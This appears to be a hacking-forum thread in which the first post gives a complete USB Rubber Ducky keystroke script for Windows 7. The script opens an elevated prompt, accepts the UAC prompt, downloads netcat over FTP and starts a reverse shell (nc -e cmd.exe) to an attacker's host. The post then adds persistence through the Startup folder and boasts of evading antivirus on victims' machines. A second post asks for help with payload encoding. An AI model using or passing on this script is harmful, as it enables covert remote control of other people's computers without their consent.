
D0oM

Active Members, 4 posts

Posts posted by D0oM

  1. My Strictly Netcat Reverse Shell

    OK, this has a few requirements, so it is not that user-friendly, but I like this method because after a few tests it has not been detected by any AV or other types of security programs.

    Works on Windows 7

    The first requirement is an FTP server. All Windows boxes include an FTP client by default; that's what I will be using to download nc.exe and the startup script .bat file. If Windows had a wget program we would not even need an FTP server. An anonymous server with upload and download turned on would be great for this, but good luck finding one. So you will probably have to run an FTP server yourself, like I have done.

    So once you have an FTP server up and running, download the Windows version of netcat, unzip it, and put the files into a directory called /tools/nc in the root directory of the user you're logging in with (you can always change my code so your Ducky script will look in whatever directory you want for the nc files).

    Download the Windows version of netcat here: http://www.downloadnetcat.com/. Scroll down and select "download netcat windows version".

    Now make a .bat file and add one line to it:

    start nc yourserver.dyndns.org 8080 -d -e cmd.exe

    Add that .bat file to the same directory your netcat files are in. In my case, /tools/nc.

    Now, on your attacking computer, you must listen for the incoming connection with this command:

    nc -l -p 8080

    Also remember to port forward port 8080 on your router to your internal listening attack computer!

    Now that you have everything set up, you are ready to put the Ducky into a victim's computer anywhere in the world. The only thing that can stop this is if the victim's network for some reason blocks 8080 incoming or outgoing. In that case, just change the port number. I've tested this on a few Windows 7 systems and it went undetected on all of them. Each one had antivirus such as McAfee and Norton. Firewalls on as well.

    REM Open an elevated prompt: Start menu, type cmd, context menu, "a" = Run as administrator
    ESCAPE
    CONTROL ESCAPE
    DELAY 900
    STRING cmd
    DELAY 900
    MENU
    DELAY 900
    STRING a
    DELAY 900
    ENTER
    DELAY 1800
    REM UAC prompt defaults to No; move to Yes and confirm
    LEFTARROW
    DELAY 900
    ENTER
    DELAY 900
    REM Fetch nc.exe and the .bat with the built-in ftp client
    STRING ftp
    ENTER
    DELAY 600
    STRING open yourftpservernamehere.dyndns.org
    ENTER
    DELAY 900
    STRING FtpUsernameHere
    ENTER
    DELAY 900
    STRING YourFtpServersUsernamesPasswdHere
    DELAY 500
    ENTER
    DELAY 1000
    STRING cd tools
    ENTER
    DELAY 900
    STRING cd nc
    DELAY 900
    ENTER
    REM mget asks once per file; each ENTER below answers one prompt
    STRING mget *
    DELAY 800
    ENTER
    DELAY 900
    ENTER
    DELAY 900
    ENTER
    DELAY 900
    ENTER
    DELAY 900
    ENTER
    DELAY 900
    ENTER
    DELAY 900
    ENTER
    DELAY 900
    ENTER
    DELAY 500
    ENTER
    STRING quit
    ENTER
    DELAY 400
    REM Launch the reverse shell in the background, then close the prompt
    STRING start nc yourlisteningservernamehere.dyndns.org 8080 -d -e cmd.exe
    ENTER
    DELAY 400
    STRING exit
    ENTER

    Now, once you're inside the victim's computer, issue the command:

    move batfileyoumade.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"

    Now their computer will run your netcat reverse shell whenever it boots.

    You may have noticed I have some long delays. I have long delays because I tested on fast and SLOW computers, which required the longer delays to work. You may also notice the "start" before the actual nc reverse shell command. This is the equivalent of the & in Linux to run a command in the background. Doing this enables us to exit out of the command prompt, leaving fewer traces of the backdoor. So the only way the victim will see the backdoor is if they check things like Task Manager.

  2. I'm just going to post here rather than make a whole new thread. Just tell me off if I'm derailing your thread. Anyway...

    I got my Duck today and I've been trying to get my payloads to work all night. When I plug the Duck into my Win7 box it sees it fine and installs drivers fine, although my payloads don't run. Not even the simple Bart Simpson payload.

    After I run my java command: java -jar /duckencode.jar -i reverse.txt -o /media/0007-545F/inject.bin

    I ran cat on my inject.bin file and there was no data in it. No unintelligible binary code or anything in sight. So I think my inject.bin file is not being created or something. Please help.
